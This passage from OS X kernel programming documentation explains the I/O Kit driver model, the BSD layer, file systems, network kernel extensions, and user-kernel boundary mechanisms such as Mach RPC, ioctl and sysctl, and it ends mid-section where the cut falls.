The I/O Kit attempts to represent, in software, the same hierarchy that exists in hardware. Some things are difficult to abstract, however. When the hardware hierarchy is difficult to represent (for example, if layering violations occur), then the I/O Kit abstractions provide less help for writing drivers.

In addition, all drivers exist to drive hardware; all hardware is different. Even with the reusable model provided by the I/O Kit, you still need to be aware of any hardware quirks that may impact a higher-level view of the device. The code to support those quirks still needs to be unique from driver to driver.

Although most developers should be able to take full advantage of I/O Kit device families (see “Families” (page 96)), there will occasionally be some who cannot. Even those developers should be able to make use of parts of the I/O Kit, however. In any case, the source code is always available. You can replace functionality and modify the classes yourself if you need to do so.

In designing the I/O Kit, one goal has been to make developers’ lives easier. Unfortunately, it is not possible to make all developers’ lives uniformly easy. Therefore, a second goal of the I/O Kit design is to meet the needs of the majority of developers, without getting in the way of the minority who need lower level access to the hardware.
I/O Kit Architecture

The I/O Kit provides a model of system hardware in an object-oriented framework. Each type of service or device is represented by a C++ class; each discrete service or device is represented by an instance (object) of that class.

There are three major conceptual elements of the I/O Kit architecture:

● “Families” (page 96)
● “Drivers” (page 97)
● “Nubs” (page 97)

Families

A family defines a collection of high-level abstractions, in the form of C code and C++ classes, that are common to all devices of a particular category. Families may include headers, libraries, sample code, test harnesses, and documentation. They provide the API, generic support code, and at least one example driver (in the documentation).

Families provide services for many different categories of devices. For example, there are protocol families (such as SCSI, USB, and FireWire), storage families (disk), network families, and families to describe human interface devices (mouse and keyboard). When devices have features in common, the software that supports those features is most likely found in a family.

Common abstractions are defined and implemented by the family, allowing all drivers in a family to share similar features easily. For example, all SCSI controllers have certain things they must do, such as scanning the SCSI bus. The SCSI family defines and implements the functionality that is common to SCSI controllers. Because this functionality has been included in the SCSI family, you do not need to include scanning code (for example) in your new SCSI controller driver.

Instead, you can concentrate on device-specific details that make your driver different from other SCSI drivers. The use of families means there is less code for you to write.

Families are dynamically loadable; they are loaded when needed and unloaded when no longer needed.
Although some common families may be preloaded at system startup, all families should be considered to be dynamically loadable (and, therefore, potentially unloaded). See the “Connection Example” (page 98) for an illustration.

Drivers

A driver is an I/O Kit object that manages a specific device or bus, presenting a more abstract view of that device to other parts of the system. When a driver is loaded, its required families are also loaded to provide necessary, common functionality. The request to load a driver causes all of its dependent requirements (and their requirements) to be loaded first. After all requirements are met, the requested driver is loaded as well. See “Connection Example” (page 98) for an illustration.

Note that families are loaded upon demand of the driver, not the other way around. Occasionally, a family may already be loaded when a driver demands it; however, you should never assume this. To ensure that all requirements are met, each device driver should list all of its requirements in its property list.

Most drivers are in a client-provider relationship, wherein the driver must know about both the family from which it inherits and the family to which it connects. A SCSI controller driver, for example, must be able to communicate with both the SCSI family and the PCI family (as a client of PCI and provider of SCSI). A SCSI disk driver communicates with both the SCSI and storage families.

Nubs

A nub is an I/O Kit object that represents a point of connection for a driver. It represents a controllable entity such as a disk or a bus.

A nub is loaded as part of the family that instantiates it. Each nub provides access to the device or service that it represents and provides services such as matching, arbitration, and power management.

The concept of nubs can be more easily visualized by imagining a TV set. There is a wire attached to your wall that provides TV service from somewhere.
For all practical purposes, it is permanently associated with that provider, the instantiating class (the cable company who installed the line). It can be attached to the TV to provide a service (cable TV). That wire is a nub.

Each nub provides a bridge between two drivers (and, by extension, between two families). It is most common that a driver publishes one nub for each individual device or service it controls. (In this example, imagine one wire for every home serviced by the cable company.)

It is also possible for a driver that controls only a single device or service to act as its own nub. (Imagine the antenna on the back of your TV that has a built-in wire.) See the “Connection Example” for an illustration of the relationship between nubs and drivers.

Connection Example

Figure 12-1 illustrates the I/O Kit architecture, using several example drivers and their corresponding nubs. Note that many different driver combinations are possible; this diagram shows only one possibility.

In this case, a SCSI stack is shown, with a PCI controller, a disk, and a SCSI scanner. The SCSI disk is controlled by a kernel-resident driver. The SCSI scanner is controlled by a driver that is part of a user application.

Figure 12-1 I/O Kit architecture
[Diagram not reproduced. Labels: IOPCIBridge family, PCI bus driver, IOPCIDevice nubs; IOSCSIParallelController family, SCSI card driver, IOSCSIParallelDevice nubs; IOBlockStorageDriver family, SCSI disk driver, IOMedia nub, Disk; User application, Device interface, User client; User space, Kernel space.]

This example illustrates how a SCSI disk driver (Storage family) is connected to the PCI bus. The connection is made in several steps.

1. The PCI bus driver discovers a PCI device and announces its presence by creating a nub (IOPCIDevice).
The nub’s class is defined by the PCI family.

[Diagram not reproduced. Labels: IOPCIBridge family, PCI bus driver, IOPCIDevice nubs, Video card, Main logic board ATA, SCSI card.]

2. The bus driver identifies (matches) the correct device driver and requests that the driver be loaded. At the end of this matching process, a SCSI controller driver has been found and loaded. Loading the controller driver causes all required families to be loaded as well. In this case, the SCSI family is loaded; the PCI family (also required) is already present. The SCSI controller driver is given a reference to the IOPCIDevice nub.

3. The SCSI controller driver scans the SCSI bus for devices. Upon finding a device, it announces the presence of the device by creating a nub (IOSCSIDevice). The class of this nub is defined by the SCSI family.

[Diagram not reproduced. Labels: IOPCIBridge family, PCI bus driver, IOPCIDevice nubs; IOSCSIParallelController family, SCSI card driver, IOSCSIParallelDevice nubs; SCSI disk, Unknown device, SCSI scanner.]

4. The controller driver identifies (matches) the correct device driver and requests that the driver be loaded. At the end of this matching process, a disk driver has been found and loaded. Loading the disk driver causes all required families to be loaded as well. In this case, the Storage family is loaded; the SCSI family (also required) is already present. The disk driver is given a reference to the IOSCSIDevice nub.

[Diagram not reproduced. Labels: IOPCIBridge family, PCI bus driver, IOPCIDevice nubs; IOSCSIParallelController family, SCSI card driver, IOSCSIParallelDevice nubs; IOBlockStorageDriver family, SCSI disk driver, IOMedia nub, Disk.]

For More Information

For more information on the I/O Kit, you should read the document I/O Kit Fundamentals, available from Apple’s developer documentation website, http://developer.apple.com/documentation. It provides a good general overview of the I/O Kit.
In addition to I/O Kit Fundamentals, the website contains a number of HOWTO documents and topic-specific documents that describe issues specific to particular technology areas such as FireWire and USB.

BSD Overview

The BSD portion of the OS X kernel is derived primarily from FreeBSD, a version of 4.4BSD that offers advanced networking, performance, security, and compatibility features. BSD variants in general are derived (sometimes indirectly) from 4.4BSD-Lite Release 2 from the Computer Systems Research Group (CSRG) at the University of California at Berkeley. BSD provides many advanced features, including the following:

● Preemptive multitasking with dynamic priority adjustment. Smooth and fair sharing of the computer between applications and users is ensured, even under the heaviest of loads.
● Multiuser access. Many people can use an OS X system simultaneously for a variety of things. This means, for example, that system peripherals such as printers and disk drives are properly shared between all users on the system or the network and that individual resource limits can be placed on users or groups of users, protecting critical system resources from overuse.
● Strong TCP/IP networking with support for industry standards such as SLIP, PPP, and NFS. OS X can interoperate easily with other systems as well as act as an enterprise server, providing vital functions such as NFS (remote file access) and email services, or Internet services such as HTTP, FTP, routing, and firewall (security) services.
● Memory protection. Applications cannot interfere with each other. One application crashing does not affect others in any way.
● Virtual memory and dynamic memory allocation. Applications with large appetites for memory are satisfied while still maintaining interactive response to users.
With the virtual memory system in OS X, each application has access to its own 4 GB memory address space; this should satisfy even the most memory-hungry applications.
● Support for kernel threads based on Mach threads. User-level threading packages are implemented on top of kernel threads. Each kernel thread is an independently scheduled entity. When a thread from a user process blocks in a system call, other threads from the same process can continue to execute on that or other processors. By default, a process in the conventional sense has one thread, the main thread. A user process can use the POSIX thread API to create other user threads.
● SMP support. Support is included for computers with multiple CPUs.
● Source code. Developers gain the greatest degree of control over the BSD programming environment because source is included.
● Many of the POSIX APIs.

BSD Facilities

The facilities that are available to a user process are logically divided into two parts: kernel facilities and system facilities implemented by or in cooperation with a server process.

The facilities implemented in the kernel define the virtual machine in which each process runs. Like many real machines, this virtual machine has memory management, an interrupt facility, timers, and counters.

The virtual machine also allows access to files and other objects through a set of descriptors. Each descriptor resembles a device controller and supports a set of operations. Like devices on real machines, some of which are internal to the machine and some of which are external, parts of the descriptor machinery are built into the operating system, while other parts are often implemented in server processes.
The BSD component provides the following kernel facilities:

● processes and protection
  ● host and process identifiers
  ● process creation and termination
  ● user and group IDs
  ● process groups
● memory management
  ● text, data, stack, and dynamic shared libraries
  ● mapping pages
  ● page protection control
● POSIX synchronization primitives
● POSIX shared memory
● signals
  ● signal types
  ● signal handlers
  ● sending signals
● timing and statistics
  ● real time
  ● interval time
● descriptors
  ● files
  ● pipes
  ● sockets
● resource controls
  ● process priorities
  ● resource utilization and resource limits
  ● quotas
● system operation support
  ● bootstrap operations
  ● shut-down operations
  ● accounting

BSD system facilities (facilities that may interact with user space) include

● generic input/output operations such as read and write, nonblocking, and asynchronous operations
● file-system operations
● interprocess communication
● handling of terminals and other devices
● process control
● networking operations

Differences between OS X and BSD

Although the BSD portion of OS X is primarily derived from FreeBSD, some changes have been made:

● The sbrk() system call for memory management is deprecated. Its use is not recommended in OS X.
● The OS X runtime model uses a different object file format for executables and shared objects, and a different mechanism for executing some of those executables. The primary native format is Mach-O. This format is supported by the dynamic link editor (dyld). The PEF binary file format is supported by the Code Fragment Manager (CFM). The kernel supports execve() with Mach-O binaries. Mapping and management of Mach-O dynamic shared libraries, as well as launching of PEF-based applications, are performed by user-space code.
● OS X does not support memory-mapped devices through the mmap() function.
(Graphic device support and other subsystems provide similar functionality, but using different APIs.) In OS X, this interface should be done through user clients. See the Apple I/O Kit documents for additional information.
● The swapon() call is not supported; macx_swapon() is the equivalent call from the Mach pager.
● The Unified Buffer Cache implementation in OS X differs from that found in FreeBSD.
● Mach provides a number of IPC primitives that are not traditionally found in UNIX. See “Boundary Crossings” for more information on Mach IPC. Some System V primitives are supported, but their use is discouraged in favor of POSIX equivalents.
● Several changes have been made to the BSD security model to support single-user and multiple-administrator configurations, including the ability to disable ownership and permissions on a volume-by-volume basis.
● The locking mechanism used throughout the kernel differs substantially from the mechanism used in FreeBSD.
● The kernel extension mechanism used by OS X is completely different. The OS X driver layer, the I/O Kit, is an object-oriented driver stack written in C++. The general kernel programming interfaces, or KPIs, are used to write non-driver kernel extensions. These mechanisms are described in more detail in “I/O Kit Overview” and KPI Reference, respectively.

In addition, several new features have been added that are specific to the OS X (Darwin) implementation of BSD. These features are not found in FreeBSD.
● enhancements to file-system buffer cache and file I/O clustering
  ● adaptive and speculative read ahead
  ● user-process controlled read ahead
  ● time aging of the file-system buffer cache
● enhancements to file-system support
  ● implementation of Apple extensions for ISO-9660 file systems
  ● multithreaded asynchronous I/O for NFS
  ● addition of system calls to support semantics of Mac OS Extended (HFS+) file systems
  ● additions to naming conventions for pathnames, as required for accessing multiple forks in Mac OS Extended file systems

For Further Reading

The BSD component of the OS X kernel is complex. A complete description is beyond the scope of this document. However, many excellent references exist for this component. If you are interested in BSD, be sure to refer to the bibliography for further information.

Although the BSD layer of OS X is derived from 4.4BSD, keep in mind that it is not identical to 4.4BSD. Some functionality of 4.4BSD has not been included in OS X. Some new functionality has been added. The cited reference materials are recommended for additional reading. However, they should not be presumed to form a definitive description of OS X.

File Systems Overview

OS X provides “out-of-the-box” support for several different file systems. These include Mac OS Extended format (HFS+), the BSD standard file system format (UFS), NFS (an industry standard for networked file systems), ISO 9660 (used for CD-ROM), MS-DOS, SMB (Windows file sharing standard), AFP (Mac OS file sharing), and UDF.

Support is also included for reading the older, Mac OS Standard format (HFS) file-system type; however, you should not plan to format new volumes using Mac OS Standard format. OS X cannot boot from these file systems, nor does the Mac OS Standard format provide some of the information required by OS X.
The Mac OS Extended format provides many of the same characteristics as Mac OS Standard format but adds additional support for modern features such as file permissions, longer filenames, Unicode, both hard and symbolic links, and larger disk sizes.

UFS provides case sensitivity and other characteristics that may be expected by BSD commands. In contrast, Mac OS Extended format is not case-sensitive (but is case-preserving).

OS X currently can boot and “root” from an HFS+, UFS, ISO, NFS, or UDF volume. That is, OS X can boot from and mount a volume of any of these types and use it as the primary, or root, file system.

Other file systems can also be mounted, allowing users to gain access to additional volume formats and features. NFS provides access to network servers as if they were locally mounted file systems. The Carbon application environment mimics many expected behaviors of Mac OS Extended format on top of both UFS and NFS. These include such characteristics as Finder Info, file ID access, and aliases.

By using the OS X Virtual File System (VFS) capability and writing kernel extensions, you can add support for other file systems. Examples of file systems that are not currently supported in OS X but that you may wish to add to the system include the Andrew file system (AFS) and the Reiser file system (ReiserFS). If you want to support a new volume format or networking protocol, you’ll need to write a file-system kernel extension.

Working With the File System

In OS X, the vnode structure provides the internal representation of a file or directory (folder). There is a unique vnode allocated for each active file or folder, including the root.

Within a file system, operations on specific files and directories are implemented via vnodes and VOP (vnode operation) calls. VOP calls are used for operations on individual files or directories (such as open, close, read, or write).
Examples include VOP_OPEN to open a file and VOP_READ to read file contents.

In contrast, file-system-wide operations are implemented using VFS calls. VFS calls are primarily used for operations on entire file systems; examples include VFS_MOUNT and VFS_UNMOUNT to mount or unmount a file system, respectively. File-system writers need to provide stubs for each of these sets of calls.

VFS Transition

The details of the VFS subsystem in OS X are in the process of changing in order to make the VFS interface sustainable. If you are writing a leaf file system, these changes will still affect you in many ways. Please contact Apple Developer Support for more information.

Network Architecture

OS X kernel extensions (KEXTs) provide mechanisms to extend and modify the networking infrastructure of OS X dynamically, without recompiling or relinking the kernel. The effect is immediate and does not require rebooting the system.

Networking KEXTs can be used to

● monitor network traffic
● modify network traffic
● receive notification of asynchronous events from the driver layer

In the last case, such events are received by the data link and network layers. Examples of these events include power management events and interface status changes.

Specifically, KEXTs allow you to

● create protocol stacks that can be loaded and unloaded dynamically and configured automatically
● create modules that can be loaded and unloaded dynamically at specific positions in the network hierarchy

The Kernel Extension Manager dynamically adds KEXTs to the running OS X kernel inside the kernel’s address space. An installed and enabled network-related KEXT is invoked automatically, depending on its position in the sequence of protocol components, to process an incoming or outgoing packet.

All KEXTs provide initialization and termination routines that the Kernel Extension Manager invokes when it loads or unloads the KEXT.
The initialization routine handles any operations that are needed to complete the incorporation of the KEXT into the kernel, such as updating protosw and domain structures (through programmatic interfaces). Similarly, the termination routine must remove references to the NKE (network kernel extension) from these structures to unload itself successfully. NKEs must provide a mechanism, such as a reference count, to ensure that the NKE can terminate without leaving dangling pointers.

For additional information on the networking portions of the OS X kernel, you should read the document Network Kernel Extensions Programming Guide.

Boundary Crossings

Two applications can communicate in a number of ways, for example, by using pipes or sockets. The applications themselves are unaware of the underlying mechanisms that provide this communication. However, this communication occurs by sending data from one program into the kernel, which then sends the data to the second program.

As a kernel programmer, it is your job to create the underlying mechanisms responsible for communication between your kernel code and applications. This communication is known as crossing the user-kernel boundary. This chapter explains various ways of crossing that boundary.

In a protected memory environment, each process is given its own address space. This means that no program can modify another program’s data unless that data also resides in its own memory space (shared memory). The same applies to the kernel. It resides in its own address space. When a program communicates with the kernel, data cannot simply be passed from one address space to the other as you might between threads (or between programs in environments like Mac OS 9 and most real-time operating systems, which do not have protected memory).

We refer to the kernel’s address space as kernel space, and collectively refer to applications’ address spaces as user space.
For this reason, applications are also commonly referred to as user-space programs, or user programs for short.

When the kernel needs a small amount of data from an application, the kernel cannot just dereference a pointer passed in from that application, since that pointer is relative to the application’s address space. Instead, the kernel generally copies that information into storage within its own address space. When a large region of data needs to be moved, it may map entire pages into kernel space for efficiency. The same behavior can be seen in reverse when moving data from the kernel to an application.

Because it is difficult to move data back and forth between the kernel and an application, this separation is called a boundary. It is inherently time consuming to copy data, even if that data is just the user-space address of a shared region. Thus, there is a performance penalty whenever a data exchange occurs. If this penalty is a serious problem, it may affect which method you choose for crossing the user-kernel boundary. Also, by trying to minimize the number of boundary crossings, you may find ways to improve the overall design of your code. This is particularly significant if your code is involved in communication between two applications, since the user-kernel boundary must be crossed twice in that case.

There are a number of ways to cross the user-kernel boundary. Some of them are covered in this chapter in the following sections:

● “Mach Messaging and Mach Interprocess Communication (IPC)”
● “BSD syscall API”
● “BSD ioctl API”
● “BSD sysctl API”
● “Memory Mapping and Block Copying”

In addition, the I/O Kit uses the user-client/device-interface API for most communication. Because that API is specific to the I/O Kit, it is not covered in this chapter.
The user client API is covered in I/O Kit Fundamentals, Accessing Hardware From Applications, and I/O Kit Device Driver Design Guidelines.

The ioctl API is also specific to the construction of device drivers, and is largely beyond the scope of this document. However, since ioctl is a BSD API, it is covered at a glance for your convenience.

This chapter covers one subset of Mach IPC: the Mach remote procedure call (RPC) API. It also covers the syscall, sysctl, memory mapping, and block copying APIs.

Security Considerations

Crossing the user-kernel boundary represents a security risk if the kernel code operates on the data in any substantial way (beyond writing it to disk or passing it to another application). You must carefully perform bounds checking on any data passed in, and you must also make sure your code does not dereference memory that no longer belongs to the client application. Also, under no circumstances should you run unverified program code passed in from user space within the kernel. See “Security Considerations” for further information.

Choosing a Boundary Crossing Method

The first step in setting up user-kernel data exchange is choosing a means to do that exchange. First, you must consider the purpose for the communication. Some crucial factors are latency, bandwidth, and the kernel subsystem involved. Before choosing a method of communication, however, you should first understand at a high level each of these forms of communication.

Mach messaging and Mach interprocess communication (IPC) are relatively low-level ways of communicating between two Mach tasks (processes), as well as between a Mach task and the kernel. These form the basis for most communication outside of BSD and the I/O Kit. The Mach remote procedure call (RPC) API is a high-level procedural abstraction built on top of Mach IPC. Mach RPC is the most common use of IPC.
The BSD syscall API is an API for calling kernel functions from user space. It is used extensively when writing file systems and networking protocols, in ways that are very subsystem-dependent. Developers are strongly discouraged from using the syscall API outside of file-system and network extensions, as no plug-in API exists for registering a new system call with the syscall mechanism.

The BSD sysctl API (in its revised form) supersedes the syscall API and also provides a relatively painless way to change individual kernel variables from user space. It has a straightforward plug-in architecture, making it a good choice where possible.

Memory mapping and block copying are used in conjunction with one of the other APIs mentioned, and provide ways of moving large amounts of data (more than a few bytes) or variably sized data to and from kernel space.

Kernel Subsystems

The choice of boundary crossing methods depends largely on the part of the kernel into which you are adding code. In particular, the boundary crossing method preferred for the I/O Kit is different from that preferred for BSD, which is different from that preferred for Mach.

If you are writing a device driver or other related code, you are probably dealing with the I/O Kit. In that case, you should instead read appropriate sections in I/O Kit Fundamentals, Accessing Hardware From Applications, and I/O Kit Device Driver Design Guidelines.

If you are writing code that resides in the BSD subsystem (for example, a file system), you should generally use BSD APIs such as syscall or sysctl unless you require high bandwidth or exceptionally low latency.

If you are writing code that resides anywhere else, you will probably have to use Mach messaging.

Bandwidth and Latency

The guidelines in the previous section apply to most communication between applications and kernel code. The methods mentioned, however, are somewhat lacking where high bandwidth or low latency are concerns.
If you require high bandwidth, but latency is not an issue, you should probably consider doing memory-mapped communication. For large messages this is handled somewhat transparently by Mach RPC, making it a reasonable choice. For BSD portions of the kernel, however, you must explicitly pass pointers and use copyin and copyout to move large quantities of data. This is discussed in more detail in “Memory Mapping and Block Copying”.

If you require low latency but bandwidth is not an issue, sysctl and syscall are not good choices. Mach RPC, however, may be an acceptable solution. Another possibility is to actually wire a page of memory (see “Memory Mapping and Block Copying” for details), start an asynchronous Mach RPC simpleroutine (to process the data), and use either locks or high/low water marks (buffer fullness) to determine when to read and write data. This can work for high-bandwidth communication as well.

If you require both high bandwidth and low latency, you should also look at the user client/device interface model used in the I/O Kit, since that model has similar requirements.

Mach Messaging and Mach Interprocess Communication (IPC)

Mach IPC and Mach messaging are the basis for much of the communication in OS X. In many cases, however, these facilities are used indirectly by services implemented on top of one of them. Mach messaging and IPC are fundamentally similar except that Mach messaging is stateless, which prevents certain types of error recovery, as explained later. Except where explicitly stated, this section treats the two as equivalent.

The fundamental unit of Mach IPC is the port. The concept of Mach ports can be difficult to explain in isolation, so instead this section assumes a passing knowledge of a similar concept, that of ports in TCP/IP.
In TCP/IP, a server listens for incoming connections over a network on a particular port. Multiple clients can connect to the port and send and receive data in word-sized or multiple-word-sized blocks. However, only one server process can be bound to the port at a time.

In Mach IPC, the concept is the same, but the players are different. Instead of multiple hosts connecting to a TCP/IP port, you have multiple Mach tasks on the same computer connecting to a Mach port. Instead of firewall rules on a port, you have port rights that specify what tasks can send data to a particular Mach port.

Also, TCP/IP ports are bidirectional, while Mach ports are unidirectional, much like UNIX pipes. This means that when a Mach task connects to a port, it generally allocates a reply port and sends a message containing send rights to that reply port so that the receiving task can send messages back to the sending task.

As with TCP/IP, multiple client tasks can open connections to a Mach port, but only one task can be listening on that port at a time. Unlike TCP/IP, however, the IPC mechanism itself provides an easy means for one task to hand off the right to listen to an arbitrary task. The term receive rights refers to a task’s ability to listen on a given port. Receive rights can be sent from task to task in a Mach message. In the case of Mach IPC (but not Mach messaging), receive rights can even be configured to automatically return to the original task if the new task crashes or becomes unreachable (for example, if the new task is running on another computer and a router crashes).

In addition to specifying receive rights, Mach ports can specify which tasks have the right to send data. A task with send rights may be able to send once, or may be able to arbitrarily send data to a given port, depending on the nature of the rights.
Using Well-Defined Ports

Before you can use Mach IPC for task communication, the sending task must be able to obtain send rights on the receiving task’s task port. Historically, there are several ways of doing this, not all of which are supported by OS X. For example, in OS X, unlike most other Mach derivatives, there is no service server or name server. Instead, the bootstrap task and mach_init subsume this functionality.

When a task is created, it is given send rights to a bootstrap port for sending messages to the bootstrap task. Normally a task would use this port to send a message that gives the bootstrap task send rights on another port so that the bootstrap task can then return data to the calling task. Various routines exist in bootstrap.h that abstract this process. Indeed, most users of Mach IPC or Mach messaging actually use Mach remote procedure calls (RPC), which are implemented on top of Mach IPC.

Since direct use of IPC is rarely desirable (because it is not easy to do correctly), and because the underlying IPC implementation has historically changed on a regular basis, the details are not covered here. You can find more information on using Mach IPC directly in the Mach 3 Server Writer’s Guide from Silicomp (formerly the Open Group, formerly the Open Software Foundation Research Institute), which can be obtained from the developer section of Apple’s website. While much of the information contained in that book is not fully up-to-date with respect to OS X, it should still be a relatively good resource on using Mach IPC.

Remote Procedure Calls (RPC)

Mach RPC is the most common use for Mach IPC. It is frequently used for user-kernel communication, but can also be used for task-to-task or even computer-to-computer communication. Programmers frequently use Mach RPC for setting certain kernel parameters such as a given thread’s scheduling policy.

RPC is convenient because it is relatively transparent to the programmer.
Instead of writing long, complex functions that handle ports directly, you have only to write the function to be called and a small RPC definition to describe how to export the function as an RPC interface. After that, any application with appropriate permissions can call those functions as if they were local functions, and the compiler will convert them to RPC calls.

In the directory osfmk/mach (relative to your checkout of the xnu module from CVS), there are a number of files ending in .defs; these files contain the RPC definitions. When the kernel (or a kernel module) is compiled, the Mach Interface Generator (MIG) uses these definitions to create IPC code to support the functions exported via RPC. Normally, if you want to add a new remote procedure call, you should do so by adding a definition to one of these existing files. (See “Building and Debugging Kernels” for more information on obtaining kernel sources.)

What follows is an example of the definition for a routine, one of the more common uses of RPC.

    routine thread_policy_get(
                thread          : thread_act_t;
                flavor          : thread_policy_flavor_t;
        out     policy_info     : thread_policy_t, CountInOut;
        inout   get_default     : boolean_t);

Notice the C-like syntax of the definition. Each parameter in the routine roughly maps onto a parameter in the C function. The C prototype for this function follows.

    kern_return_t thread_policy_get(
        thread_act_t            act,
        thread_policy_flavor_t  flavor,
        thread_policy_t         policy_info,
        mach_msg_type_number_t  *count,
        boolean_t               *get_default);

The first two parameters are integers, and are passed as call-by-value. The third is a struct containing integers. It is an outgoing parameter, which means that the values stored in that variable will not be received by the function, but will be overwritten on return.
Note: The parameters are all word-sized or multiples of the word size. Smaller data are impossible because of limitations inherent to the underlying Mach IPC mechanisms.

From there it becomes more interesting. The fourth parameter in the C prototype is a representation of the size of the third. In the definition file, this is represented by an added option, CountInOut.

The MIG option CountInOut specifies that there is to be an inout parameter called count. An inout parameter is one in which the original value can be read by the function being called, and its value is replaced on return from that function. Unlike a separate inout parameter, however, the value initially passed through this parameter is not directly set by the calling function. Instead, it is tied to the policy_info parameter so that the number of integers in policy_info is transparently passed in through this parameter.

The function itself checks the count parameter to verify that the buffer is at least as large as the data to be returned, so that it never writes past the end of the array. The function changes the value stored in count to be the desired size and returns an error if the buffer is not large enough (unless the buffer pointer is null, in which case it returns success). Otherwise, it dereferences the various fields of the policy_info parameter and in so doing, stores appropriate values into it, then returns.

Note: Since Mach RPC is done via message passing, inout parameters are technically call-by-value-return and not call-by-reference. For more realistic call-by-reference, you need to pass a pointer. The distinction is not particularly significant except when aliasing occurs. (Aliasing means having a single variable visible in the same scope under two or more different names.)

In addition to the routine, Mach RPC also has a simpleroutine.
A simpleroutine is a routine that is, by definition, asynchronous. It can have no out or inout parameters and no return value. The caller does not wait for the function to return. One possible use for this might be to tell an I/O device to send data as soon as it is ready. In that use, the simpleroutine might simply wait for data, then send a message to the calling task to indicate the availability of data.

Another important feature of MIG is that of the subsystem. In MIG, a subsystem is a group of routines and simpleroutines that are related in some way. For example, the semaphore subsystem contains related routines that operate on semaphores. There are also subsystems for various timers, parts of the virtual memory (VM) system, and dozens of others in various places throughout the kernel.

Most of the time, if you need to use RPC, you will be doing it within an existing subsystem. The details of creating a new subsystem are beyond the scope of this document. Developers needing to add a new Mach subsystem should consult the Mach 3 Server Writer’s Guide from The Open Group (TOG), which can be obtained from various locations on the internet.

Another feature of MIG is the type. A type in MIG is exactly the same thing as it is in programming languages. However, the construction of aggregate types differs somewhat.

    type clock_flavor_t = int;
    type clock_attr_t = array[*:1] of int;
    type mach_timespec_t = struct[2] of int;

Data of type array is passed as the user-space address of what is assumed to be a contiguous array of the base type, while a struct is passed by copying all of the individual values of an array of the base type. Otherwise, these are treated similarly. A “struct” is not like a C struct, as elements of a MIG struct must all be of the same base type.
The declaration syntax is similar to Pascal, where *:1 and 2 represent sizes for the array or structure, respectively. The *:1 construct indicates a variable-sized array, where the size can be up to 1, inclusive, but no larger.

Calling RPC From User Applications

RPC, as mentioned previously, is virtually transparent to the client. The procedure call looks like any other C function call, and no additional library linkage is needed. You need only to bring the appropriate headers in with a #include directive. The compiler automatically recognizes the call as a remote procedure call and handles the underlying MIG aspects for you.

BSD syscall API

The syscall API is the traditional UNIX way of calling kernel functions from user space. Its implementation varies from one part of the kernel to the next, however, and it is completely unsupported for loadable modules. For this reason, it is not a recommended way of getting data into or out of the kernel in OS X unless you are writing a file system.

File systems have to support a number of standard system calls (for example, mount), but do so by means of generic file system routines that call the appropriate file-system functions. Thus, if you are writing a file system, you need to implement those functions, but you do not need to write the code that handles the system calls directly. For more information on implementing syscall support in file systems, see the chapter “File Systems Overview” (page 106).

BSD ioctl API

The ioctl interface provides a way for an application to send certain commands or information to a device driver. These can be used for parameter tuning (though this is more commonly done with sysctl), but can also be used for sending instructions for the driver to perform a particular task (for example, rewinding a tape drive).

The use of the ioctl interface is essentially the same under OS X as it is in other BSD-derived operating systems, except in the way that device drivers register themselves with the system.
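As a rough illustration of the command-dispatch idea described above, the following sketch models a driver-side ioctl handler in ordinary user-space C. Everything in it is hypothetical: the MODEL_TAPE_* command codes, the model_tape structure, and the simplified three-argument handler signature are assumptions made for this example and are not the actual OS X driver entry point.

```c
#include <errno.h>
#include <stddef.h>

/* Hypothetical command codes. A real driver would publish its codes in a
 * header shared with the applications that call it. */
#define MODEL_TAPE_REWIND      1UL
#define MODEL_TAPE_SET_DENSITY 2UL

/* Hypothetical per-device state for the model. */
struct model_tape {
    long position;
    int  density;
};

/* Simplified stand-in for a driver's ioctl entry point: it switches on the
 * command code and interprets the data pointer according to that code. */
int model_tape_ioctl(struct model_tape *dev, unsigned long cmd, void *data)
{
    switch (cmd) {
    case MODEL_TAPE_REWIND:
        dev->position = 0;           /* command with no argument */
        return 0;
    case MODEL_TAPE_SET_DENSITY:
        if (data == NULL)
            return EINVAL;           /* this command requires an argument */
        dev->density = *(int *)data; /* parameter tuning */
        return 0;
    default:
        return ENOTTY;               /* conventional errno for an unknown command */
    }
}
```

In this model an application-side caller passes one of the shared command codes together with an optional argument pointer; unknown codes are rejected with ENOTTY, the conventional error for an unsupported ioctl request.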
In OS X, unlike most BSDs, the contents of the /dev directory are created dynamically by the kernel. The file system mounted on /dev is referred to as devfs. You can, of course, still manually create device nodes with mknod, because devfs is union mounted over the root file system.

The I/O Kit automatically registers some types of devices with devfs, creating a node in /dev. If your device family does not do that, you can manually register yourself in devfs using cdevsw_add or bdevsw_add (for character and block devices, respectively).

When registering a device manually with devfs, you create a struct cdevsw or struct bdevsw yourself. In that device structure, one of the function pointers is to an ioctl function. You must define the particular values passed to the ioctl function in a header file accessible to the person compiling the application.

A user application can also look up the device using the I/O Kit function call getMatchingServices and then use various I/O Kit calls to tune parameters instead. For more information on looking up a device driver from an application, see the document Accessing Hardware From Applications.

You can also find additional information about writing an ioctl in The Design and Implementation of the 4.4 BSD Operating System. See the bibliography at the end of this document for more information.

BSD sysctl API

The system control (sysctl) API is specifically designed for kernel parameter tuning. This functionality supersedes the syscall API, and also provides an easy way to tune simple kernel parameters without actually needing to write a handler routine in the kernel.

The sysctl namespace is divided into several broad categories corresponding to the purpose of the parameters in it.
Some of these areas include

● kern—general kernel parameters
● vm—virtual memory options
● fs—filesystem options
● machdep—machine dependent settings
● net—network stack settings
● debug—debugging settings
● hw—hardware parameters (generally read-only)
● user—parameters affecting user programs
● ddb—kernel debugger

Most of the time, programs use the sysctl call to retrieve the current value of a kernel parameter. For example, in OS X, the hw sysctl group includes the option ncpu, which returns the number of processors in the current computer (or the maximum number of processors supported by the kernel on that particular computer, whichever is less).

The sysctl API can also be used to modify parameters (though most parameters can only be changed by root). For example, in the net hierarchy, net.inet.ip.forwarding can be set to 1 or 0, to indicate whether the computer should forward packets between multiple interfaces (basic routing).

General Information on Adding a sysctl

When adding a sysctl, you must do all of the following first:

● add the following includes:
    #include
    #include
    #include
    #include
● add -no-cpp-precomp to your compiler options in Project Builder (or to CFLAGS in your makefile if building by hand).

Adding a sysctl Procedure Call

Adding a system control (sysctl) was once a daunting task requiring changes to dozens of files. With the current implementation, a system control can be added simply by writing the appropriate handler functions and then registering the handler with the system at runtime. The old-style sysctl, which used fixed numbers for each control, is deprecated.

Note: Because this is largely a construct of the BSD subsystem, all path names in this section can be assumed to be from /path/to/xnu-version/bsd/.
Also, you may safely assume that all program code snippets should go into the main source file for your subsystem or module unless otherwise noted, and that in the case of modules, function calls should be made from your start or stop routines unless otherwise noted.

The preferred way of adding a sysctl looks something like the following:

